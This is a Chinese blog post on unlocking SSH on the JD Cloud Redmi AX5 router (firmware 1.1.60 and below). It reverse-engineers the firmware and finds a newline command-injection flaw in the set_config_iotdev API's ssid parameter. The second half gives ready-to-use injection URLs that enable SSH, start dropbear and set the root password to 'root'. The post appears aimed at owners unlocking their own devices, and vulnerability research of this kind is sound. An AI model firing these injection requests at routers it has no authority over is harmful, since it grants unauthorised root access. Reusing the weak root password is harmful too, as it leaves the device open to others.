解锁京东云 Redmi AX5 ssh

发布于 2021-11-18  5545 次阅读


工具准备

  1. milua 反编译工具 NyaMisty/luadec_miwifi: Lua Decompiler for lua 5.1 , 5.2 and 5.3 (github.com)
  2. ax5 固件 [Ax5京东云]1.1.47固件下载地址 - 京东云无线宝 - 恩山无线论坛 - Powered by Discuz! (right.com.cn)

本漏洞适用版本为: 1.1.60 及以下

分析与破解

漏洞成因分析

ax5普通版解锁方式

[OpenWrt Wiki] Xiaomi AX1800 (AX5/RA67)

http://192.168.31.1/cgi-bin/luci/;stok=/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit%3B
http://192.168.31.1/cgi-bin/luci/;stok=/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bsed%20-i%20%27s/channel=.*/channel=%5C"debug%5C"/g%27%20/etc/init.d/dropbear%3B
http://192.168.31.1/cgi-bin/luci/;stok=/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B/etc/init.d/dropbear%20start%3B
http://192.168.31.1/cgi-bin/luci/;stok=/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B/etc/init.d/dropbear%20enable%3B
http://192.168.31.1/cgi-bin/luci/;stok=/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=ssid=-h%0Aecho%20-e%20%27%5Cn%27%20%7C%20passwd%20root%0A

上面是普通版 AX5 的 ssh 解锁方式,执行了之后返回成功代码,只不过跑完命令之后并没有解锁 ssh:

file

解包逆向

尝试了很久,一度想要放弃了,看到网上有人说可以逆一下 lua 分析流程,我就对固件做了个解包:

binwalk -e miwifi_ra50_firmware_a69aa_1.1.47.bin
cd _miwifi_ra50_firmware_a69aa_1.1.47.bin.extracted/
unsquashfs -dest rootfs 3B0B88.squashfs

猜测 api 都是由某一个 lua 来实现的:

grep 'misystem' -r .

file

luadec 进行反编译(只用看字节码就行了,字节码编译之后结果会有问题)

./luadec -dis xiaomi/XQSecureUtil.lua > XQSecureUtil.dis

可以看到这里就是我们传参所用的 ssid:

file

继续往下审,可以发现 forkExec 函数调用,这里会将多个参数进行拼接并且执行 connect -s 命令:

file

按理来说这里其实也没有对输入作出任何限制,那为什么注入不了呢?

继续看 parseCmdline 这个函数,在另外一个文件里面:

file

这里就很明显了,lua会对所有输入中的特殊字符进行处理,避免命令拼接,这个对于 web 手来说应该很好绕,我硬是绕了很久,才发现这个函数没有过滤回车符:

尝试执行重启指令,路由器挂掉了

file

于是思路就有了,可以尝试进行解锁了

尝试解锁

现在我们能够任意命令执行了,只不过 \ ` " $ & | ; 这几个符号不能用来分隔命令,但是这几个符号可以作为参数传入。稍加构造就可以完成解锁 ssh 的组合拳:

nvram set ssh_en=1; 
nvram commit;
sed -i 's/channel=.*/channel=\"debug\"/g' /etc/init.d/dropbear;
/etc/init.d/dropbear start
/etc/init.d/dropbear enable
echo -e "root\nroot" | passwd root

假设路由器的 ip 为 192.168.61.1:

  1. 设置 ssh_en

    nvram set ssh_en=1;
    nvram commit;

    http://192.168.61.1/cgi-bin/luci/;stok=TOKEN/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%0anvram%20set%20ssh_en=1%0anvram%20commit%0a
  2. 修改 dropbear 配置

    sed -i 's/channel=.*/channel=\"debug\"/g' /etc/init.d/dropbear;
    这个涉及到截断字符,所以我使用 echo + sh 执行的方式来操作

    http://192.168.61.1/cgi-bin/luci/;stok=TOKEN/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%0aecho%20sed%20-i%20's/channel=.*/channel="debug"/g'%20/etc/init.d/dropbear%20>%20/tmp/r.sh%0ash%20/tmp/r.sh%0arm%20/tmp/r.sh%0a
  3. 开启 dropbear

    /etc/init.d/dropbear start;

    http://192.168.61.1/cgi-bin/luci/;stok=TOKEN/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%0a/etc/init.d/dropbear%20start%0a
  4. 开启 dropbear

    /etc/init.d/dropbear enable;

    http://192.168.61.1/cgi-bin/luci/;stok=TOKEN/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%0a/etc/init.d/dropbear%20enable%0a
  5. 修改 root 密码

    echo -e "root\nroot" | passwd root;
    这个涉及到截断字符,所以我使用 echo + sh 执行的方式来操作

    http://192.168.61.1/cgi-bin/luci/;stok=TOKEN/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%0aecho%20echo%20-e%20"root\nroot"%20|%20passwd%20root%20>%20/tmp/pass.sh%0ash%20/tmp/pass.sh%0arm%20/tmp/pass.sh%0a

    完整代码如下:

    http://192.168.61.1/cgi-bin/luci/;stok=PUT_TOKEN_HERE/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%0anvram%20set%20ssh_en=1%0anvram%20commit%0a
    
    http://192.168.61.1/cgi-bin/luci/;stok=PUT_TOKEN_HERE/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%0aecho%20sed%20-i%20's/channel=.*/channel="debug"/g'%20/etc/init.d/dropbear%20>%20/tmp/r.sh%0ash%20/tmp/r.sh%0arm%20/tmp/r.sh%0a
    
    http://192.168.61.1/cgi-bin/luci/;stok=PUT_TOKEN_HERE/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%0a/etc/init.d/dropbear%20start%0a
    
    http://192.168.61.1/cgi-bin/luci/;stok=PUT_TOKEN_HERE/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%0a/etc/init.d/dropbear%20enable%0a
    
    http://192.168.61.1/cgi-bin/luci/;stok=PUT_TOKEN_HERE/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%0aecho%20echo%20-e%20"root\nroot"%20|%20passwd%20root%20>%20/tmp/pass.sh%0ash%20/tmp/pass.sh%0arm%20/tmp/pass.sh%0a

CTFer|NOIPer|CSGO|摸鱼|菜鸡